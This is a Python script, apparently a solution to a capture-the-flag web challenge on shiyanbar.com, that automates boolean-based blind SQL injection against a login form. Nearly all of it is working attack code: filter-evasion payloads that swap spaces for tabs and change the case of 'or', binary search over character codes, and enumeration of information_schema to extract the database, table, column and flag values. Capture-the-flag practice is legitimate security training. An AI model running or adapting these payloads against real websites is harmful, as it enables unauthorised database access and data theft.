# -*- coding:utf8 -*-
import requests
import urllib
# 设置代理,用于调试过程中抓包分析
proxies = {
"http": "http://localhost:9008",
"https": "http://localhost:9008",
}
headers = {
"Host": "ctf5.shiyanbar.com",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
"Accept-Encoding": "gzip, deflate",
"Referer": "http://www.shiyanbar.com/ctf/2009",
"Content-Type": "application/x-www-form-urlencoded",
"Connection": "keep-alive",
"Upgrade-Insecure-Requests": "1"
}
url = 'http://ctf5.shiyanbar.com/web/earnest/index.php'
temp = 0
def make_payload(target):
return target.replace(' ','%09').replace('or','Or')
def get_length(target): #获取字段长度
global headers
global url
for i in range(0,50):
#print(i)
payload = target[:-5]+str(i)+target[-5:]
print("get_length:"+payload)
payload = urllib.parse.unquote(make_payload(payload))
data = {"id":payload,"submit":"%E6%8F%90%E4%BA%A4"}
content = requests.post(url=url,headers=headers,data=data).text
if 'You are in' in content:
return i
return 0
def search2(l,r,target):#二分盲注
if l>r:
return
global headers
global url
global temp
mid = int((l+r)/2)
payload = target[:-5]+str(mid)+target[-5:]
payload = urllib.parse.unquote(make_payload(payload))
#payload = make_payload(payload)
print("search2:"+payload)
data = {"id":payload,"submit":"%E6%8F%90%E4%BA%A4"}
content = requests.post(url=url,headers=headers,data=data).text
if "You are in" in content:
temp = max(temp,mid)
search2(mid+1,r,target)
else:
search2(l,mid-1,target)
def get_content(column,table,offset,len,where,sign): # 构造payload
global temp
content = ''
for i in range(1,len+1):
temp = 0
if sign==0:
payload = "0'Or(select ascii((select mid("+str(column)+" from "+str(i)+") from "+str(table)+" limit 1 offset "+str(offset)+"))>=)Or'0"
else:
payload = "0'Or(select ascii((select mid("+str(column)+" from "+str(i)+") from "+str(table)+" "+str(where)+" limit 1 offset "+str(offset)+"))>=)Or'0"
search2(0,255,payload)
content+=chr(temp)
print("get_content:"+content)
return content
##--------获取数据库名--------
payload = "0'Or(length((select schema_name from information_schema.schemata limit 1 offset 1))=)Or'0"
len = get_length(payload) #18
database = get_content('schema_name','information_schema.schemata',"1",len,0,0) #ctf_sql_bool_blind#test
print("database:",database)
##--------获取表名--------
#payload = "0'Or(length((select table_name from information_schema.tables where table_schema=0x6374665f73716c5f626f6f6c5f626c696e64 limit 1 offset 0))=)Or'0"
payload = "0'Or(length((select table_name from information_schema.tables where table_schema='"+database+"' limit 1 offset 0))=)Or'0"
len = get_length(payload) #4,5
#table = get_content('table_name','information_schema.tables',"0",4,'where table_schema=0x6374665f73716c5f626f6f6c5f626c696e64',1) #fiag
table = get_content('table_name','information_schema.tables',"0",len,"where table_schema='"+database+"'",1) #fiag
print("table:",table)
##--------获取列名--------
#payload = "0'Or(length((select COLUMN_NAME from infOrmation_schema.KEY_COLUMN_USAGE where TABLE_NAME='fiag' limit 1 offset 0))=)Or'0"
payload = "0'Or(length((select COLUMN_NAME from infOrmation_schema.KEY_COLUMN_USAGE where TABLE_NAME='"+table+"' limit 1 offset 0))=)Or'0"
len = get_length(payload) #5
print('len',len)
#column = get_content('column_name','infOrmation_schema.KEY_COLUMN_USAGE',0,len,"where table_name='fiag'",1) #fL$4G
column = get_content('column_name','infOrmation_schema.KEY_COLUMN_USAGE',0,len,"where table_name='"+table+"'",1) #fL$4G
print('column:',column)
##--------获取字段内容--------
#payload = "0'Or(length((select fL$4G from fiag limit 1 offset 0))=)Or'0"
payload = "0'Or(length((select "+column+" from "+table+" limit 1 offset 0))=)Or'0"
len = get_length(payload) #19
print('len',len)
#flag = get_content('fL$4G','fiag',"0",19,'0',0) #flag{haha~you win!}
flag = get_content(column,table,"0",len,'0',0) #flag{haha~you win!}
